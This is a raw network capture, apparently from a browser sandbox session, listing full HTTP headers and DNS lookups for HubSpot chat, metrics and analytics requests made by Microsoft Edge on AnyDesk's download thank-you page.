referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:35 GMT
cf-ray: 8cdeabd21c990bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=0fbd4fac-4d83-421e-bb74-05b85640265f
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 0fbd4fac-4d83-421e-bb74-05b85640265f
set-cookie: __cf_bm=PBBTSbgWS7_e4o1YwXH0lDqcbeHzjhy0AL6wjyirFEo-1728144515-1.0.1.1-PwweMnH_BLIqbHqMmLcin3Aj3DdXiIVrRHatltLDBTOA5eSQ1M6SuBlYaNmDIydAmz4FRpM4HBDlScqAbYEZ1g; path=/; expires=Sat, 05-Oct-24 16:38:35 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FHiNHIcIhNowF5dyu5oYrQ4lHkxkgfUdPt7Mc3AuvHhzwO4LwH0U8fHjx%2FTKlvJJ4wmkashsfUMK0vBzU3ImI3TWbC3gbj9GHUxXkKivuII0aA0XwLlU8i0l4XKwvQeTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=TSrNONEPFKZlKI74wq9Rh_nQcuBNAH1qPgWPlBhJDPo-1728144515060-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 329
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:35 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 25
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 8a3fcf3e-8400-449d-bb64-bc1df2ff0344
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-k7krz
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 8a3fcf3e-8400-449d-bb64-bc1df2ff0344
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=qXsWm52KJZQ3DV.DgFb0uVvkQJBBz4ULS8VMxzZ0Li8-1728144515-1.0.1.1-Ia8Fp7v1SkaoFdIj5278pNk1l3ckV3Aw2fhvmmAouthSLOf1.ChRr5a1q7PU627sHi4Q6kDOjGizr6FHk0PMHQ; path=/; expires=Sat, 05-Oct-24 16:38:35 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXVsqLoCqyotuo9J%2FVLYA1E26c04lGfZHAMQ4CBAanxuXWtTRpKHEOHDD5ndJlaioHdYXJx4kM9AT7aQ%2BDgR8OQgCGOzymtoon5reOIPt3TLCm00DGV8Gf2YPmr%2FHngiCPVthL%2BlW4hzM3wM"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=Sz1zri5OyFV_Cz_0665rR54UqcpRjcVixQlUaO0Yodc-1728144515064-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeabd21ca00bad-AMS
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626 HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 2145
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:35 GMT
cf-ray: 8cdeabd21c9c0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=82b590ad-ce39-4f39-ad5f-dc79140d00a7
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 82b590ad-ce39-4f39-ad5f-dc79140d00a7
set-cookie: __cf_bm=TtuLMA9Z4VnSaRw04cBeMuDJWiiHVrkR87SDGJkmYz4-1728144515-1.0.1.1-X47LxbFSff7oJUBPlQmNZ6DdqCys1OUW6RFVzjgedTlpVmSVTP2GrkULjqVmasidS66uDCHd2ybK7GxHNoDq8w; path=/; expires=Sat, 05-Oct-24 16:38:35 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAUPdaQg0UNoRQYqbis8pxBZgFEB7uSS73T95HNO65yl%2BIowMgHtkNbvy9q9Ebn2aWQ5kfoea0kTNnPSrFbqXm1Fc8QGJWKm3P1okoq8l7cYOo5CrYQdEIfO2eM3iw2Y2g%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=aVE05k.occ7QAP4YFjbmzgzOprLmZ7CB9C0Y.S.iYHA-1728144515068-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 880
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:37 GMT
cf-ray: 8cdeabdfaf030bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=e351da65-ec6e-4a82-83da-0426ed4dc609
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: e351da65-ec6e-4a82-83da-0426ed4dc609
set-cookie: __cf_bm=m0omJxX8U9qWwEiamAG2qTvpte7nxH53No3a2OaSoo4-1728144517-1.0.1.1-MjWHOeiJZwdiCZxKHTjkl0D9PtfSZACiYVU2eZfYYhFUFUbwZCNNZ3hnGTaVCwGDfkcSL205ZMu7WsN_eHWcvg; path=/; expires=Sat, 05-Oct-24 16:38:37 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7p4rlgJLx8SUzPta%2BAaP%2FDDQ3SfzNubz22GTTwxodlHCgjaAEFEGcfMyvxSRezDCsy7%2F1UKD8IZbep9SpZT1%2BT6LAp25Wb9vxSQSjNJdpsqMSQytAIO8qyOzn6X8A7oLA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=AudiMMg7z0gsaQFLRzcAuSxHcfiwigOnzNr8SmxUaPI-1728144517195-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/send HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 591
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:45 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 26
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 5084a2b8-90d9-45f0-a0ba-61dbcabc7054
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-9dcbf
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 5084a2b8-90d9-45f0-a0ba-61dbcabc7054
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=.G57wtfb0i6zWGfLQ9L9nyPcsvnkj9zIFEBqMxcfk1U-1728144525-1.0.1.1-Z_dKVNOzhN7PKvUR_N3pzzmynbsZ88SeUL6c.WYvEpvvSrRVOLBLoq6f4_aW3Na135T4eifMvemQ0IthfPgOrA; path=/; expires=Sat, 05-Oct-24 16:38:45 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=munwd%2BIuXTsSi67wr1mX7WwGm5cVroOH1NCg7v8pOoW8drw3h2ymMs3TGFsKNQTSbEI1jc40jtwwMMxUTwVR7kDBJW0spUwu77T6SceDCoMyujXvuxIZzXs1fM7OUGAbZHB3vrf4LtMvEHeX"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=TKFVQW1754cs7b8kLcZOCgGUh8GQIMTZRC7wsUmC8Mk-1728144525268-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeac11b9ea0bad-AMS
GET

https://js.usemessages.com/conversations-embed.js

msedge.exe

Remote address:

104.16.78.142:443

Request

GET /conversations-embed.js HTTP/2.0
host: js.usemessages.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: application/javascript; charset=utf-8
x-amz-replication-status: COMPLETED
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: JWdsgkLPA6ZPx8O3AKEWCHJFpp9DhJBz
content-encoding: gzip
etag: W/"f4a7c3be38aebfc93bbabac26a17711d"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 736ad67f05a9a5a8fd5ed8cba30196f4.cloudfront.net (CloudFront)
x-amz-cf-pop: IAD12-P3
x-amz-cf-id: BtHjUsWluhdR_9xGBsgzm8CEvCyoAkxdf_Nxo48qNY4n4bLf-aiW2g==
age: 272
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-embed/static-1.18177/bundles/project.js&cfRay=8cdea4096cf7664e-AMS
cache-control: max-age=600
x-hs-target-asset: conversations-embed/static-1.18177/bundles/project.js
x-content-type-options: nosniff
x-hs-cache-status: HIT
x-envoy-upstream-service-time: 1
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: a2221e62-f5ef-40b9-b11d-860f4e32599a
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-2j5z8
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: a2221e62-f5ef-40b9-b11d-860f4e32599a
cache-tag: staticjsapp-conversations-embed-web-prod,staticjsapp-prod
cf-cache-status: HIT
server: cloudflare
cf-ray: 8cdeaab18e3e415a-AMS
GET

https://js.hs-analytics.net/analytics/1728144300000/7940397.js

msedge.exe

Remote address:

104.16.160.168:443

Request

GET /analytics/1728144300000/7940397.js HTTP/2.0
host: js.hs-analytics.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:48 GMT
content-type: text/javascript
x-amz-id-2: atcxNuYxPK6NZsLZS/az/vfybSvv4YBa/3sCoSWKSPk5pPR9pX4hYQdsvfja6jsZdRhw1C1rCws=
x-amz-request-id: VWA9NDYDSW3ZF3PG
last-modified: Sat, 05 Oct 2024 06:50:37 GMT
etag: W/"1c104af5b24b5063ee20bf86eec00743"
x-amz-server-side-encryption: AES256
cache-control: max-age=300,public
x-amz-version-id: null
access-control-allow-credentials: false
vary: origin, Accept-Encoding
expires: Sat, 05 Oct 2024 16:10:13 GMT
content-encoding: gzip
x-envoy-upstream-service-time: 20
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 17dcb3b7-f192-48b8-93f9-1e863af7d547
x-evy-trace-served-by-pod: iad02/analytics-js-proxy-td/envoy-proxy-75d7846cb8-m87qw
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 17dcb3b7-f192-48b8-93f9-1e863af7d547
cf-cache-status: HIT
age: 106
server: cloudflare
cf-ray: 8cdeaab1ae81b8e4-AMS
DNS

js.hs-banner.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-banner.com

IN A

Response

js.hs-banner.com

IN A

104.18.40.240

js.hs-banner.com

IN A

172.64.147.16
DNS

js.hs-banner.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.hs-banner.com

IN A

Response

js.hs-banner.com

IN A

172.64.147.16

js.hs-banner.com

IN A

104.18.40.240
